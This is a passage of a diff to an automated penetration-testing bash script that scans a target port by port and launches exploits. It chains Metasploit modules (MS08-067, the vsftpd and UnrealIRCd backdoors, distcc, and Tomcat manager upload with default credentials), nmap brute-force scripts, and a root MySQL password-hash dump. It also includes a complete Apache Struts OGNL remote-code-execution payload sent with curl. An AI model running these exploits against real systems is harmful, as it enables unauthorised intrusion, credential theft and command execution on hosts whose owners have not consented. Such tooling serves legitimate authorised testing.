nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
@@ -1023,7 +1033,7 @@ else
if [ "$MODE" = "web" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
nmap -A -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb https://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -1053,14 +1063,20 @@ else
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET | head -n 1
fi
if [ $SCAN_TYPE == "DOMAIN" ];
then
if [ -z $GHDB ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=---------- -- +$RESET"
goohak $TARGET > /dev/null
if [ "$GOOHAK" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Google Hacking Queries]=-------------------- -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +$RESET"
goohak $TARGET > /dev/null
fi
echo -e "$OKGREEN + -- ----------------------------=[Running InUrlBR OSINT Queries]=----------- -- +$RESET"
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
@@ -1079,7 +1095,7 @@ else
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
@@ -1112,7 +1128,7 @@ then
echo -e "$OKRED + -- --=[Port 1433 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 1433 opened... running tests...$RESET"
nmap -A -sV -T5 --script=mssql* -p 1433 $TARGET
nmap -A -sV -T5 --script=ms-sql* -p 1433 $TARGET
fi
if [ -z "$port_2049" ];
@@ -1120,7 +1136,7 @@ then
echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET"
nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET
nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET
rpcinfo -p $TARGET
showmount -e $TARGET
smbclient -L $TARGET -U " "%" "
@@ -1131,7 +1147,7 @@ then
echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET"
nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET
nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET
msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
@@ -1140,7 +1156,7 @@ then
echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
nmap -A -sV --script=mysql* -p 3306 $TARGET
nmap -A -sV --script=mysql* -p 3306 $TARGET
mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
fi
@@ -1149,7 +1165,7 @@ then
echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET"
nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET
nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET
fi
if [ -z "$port_3128" ];
@@ -1157,7 +1173,7 @@ then
echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET"
nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET
nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET
fi
if [ -z "$port_3389" ];
@@ -1165,7 +1181,7 @@ then
echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET
nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET
rdesktop $TARGET &
fi
@@ -1174,7 +1190,7 @@ then
echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET"
nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET
nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET
msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
fi
@@ -1195,7 +1211,7 @@ else
cd $INSTALL_DIR
nikto -h https://$TARGET:4443
cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
nmap -A -p 4443 -T5 --script=*proxy* $TARGET
nmap -sV -A -p 4443 -T5 --script=*proxy* $TARGET
fi
if [ -z "$port_5432" ];
@@ -1203,7 +1219,7 @@ then
echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
nmap -A -sV --script=pgsql-brute -p 5432 $TARGET
nmap -A -sV --script=pgsql-brute -p 5432 $TARGET
fi
if [ -z "$port_5800" ];
@@ -1211,7 +1227,7 @@ then
echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET"
nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET
nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET
fi
if [ -z "$port_5900" ];
@@ -1219,7 +1235,7 @@ then
echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET"
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
fi
if [ -z "$port_5984" ];
@@ -1227,7 +1243,7 @@ then
echo -e "$OKRED + -- --=[Port 5984 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5984 opened... running tests...$RESET"
nmap -A -sV -T5 --script=couchdb* -p 5984 $TARGET
nmap -A -sV -T5 --script=couchdb* -p 5984 $TARGET
msfconsole -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"
fi
@@ -1236,7 +1252,8 @@ then
echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET"
nmap -A -sV -T5 --script=x11* -p 6000 $TARGET
nmap -A -sV -T5 --script=x11* -p 6000 $TARGET
msfconsole -x "use auxiliary/scanner/x11/open_x11; set RHOSTS "$TARGET"; exploit;"
fi
if [ -z "$port_6667" ];
@@ -1244,7 +1261,7 @@ then
echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET"
nmap -A -sV -T5 --script=irc* -p 6667 $TARGET
nmap -A -sV -T5 --script=irc* -p 6667 $TARGET
msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
fi
@@ -1261,6 +1278,7 @@ else
cd ..
nikto -h http://$TARGET:8000
cutycapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8000 -T5 $TARGET
fi
if [ -z "$port_8100" ];
@@ -1279,6 +1297,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8100
cutycapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8100 -T5 $TARGET
fi
if [ -z "$port_8080" ];
@@ -1297,7 +1316,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8080
cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg
nmap -A -p 8080 -T5 --script=*proxy* $TARGET
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 --script=*proxy* $TARGET
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
@@ -1320,7 +1339,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8180
cutycapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg
nmap -p 8180 -T5 --script=*proxy* $TARGET
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -p 8180 -T5 --script=*proxy* $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
@@ -1343,7 +1362,7 @@ else
cd $INSTALL_DIR
nikto -h https://$TARGET:8443
cutycapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg
nmap -A -p 8443 -T5 --script=*proxy* $TARGET
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8443 -T5 --script=*proxy* $TARGET
fi
if [ -z "$port_8888" ];
@@ -1358,6 +1377,7 @@ else
xsstracer $TARGET 8888
nikto -h http://$TARGET:8888
cutycapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8888 -T5 $TARGET
fi
if [ -z "$port_10000" ];
@@ -1375,7 +1395,7 @@ then
echo -e "$OKRED + -- --=[Port 27017 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27017 opened... running tests...$RESET"
nmap -p 27017 -T5 --script=mongodb* $TARGET
nmap -sV --script -p 27017 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_27018" ];
@@ -1383,7 +1403,7 @@ then
echo -e "$OKRED + -- --=[Port 27018 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27018 opened... running tests...$RESET"
nmap -p 27018 -T5 --script=mongodb* $TARGET
nmap -sV -p 27018 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_27019" ];
@@ -1391,7 +1411,7 @@ then
echo -e "$OKRED + -- --=[Port 27019 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27019 opened... running tests...$RESET"
nmap -p 27019 -T5 --script=mongodb* $TARGET
nmap -sV -p 27019 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_28017" ];
@@ -1399,7 +1419,7 @@ then
echo -e "$OKRED + -- --=[Port 28017 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 28017 opened... running tests...$RESET"
nmap -p 28017 -T5 --script=mongodb* $TARGET
nmap -sV -p 28017 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_49152" ];
@@ -1419,7 +1439,7 @@ if [ "$FULLNMAPSCAN" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET"
nmap -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
fi
if [ "$AUTOBRUTE" = "0" ]; then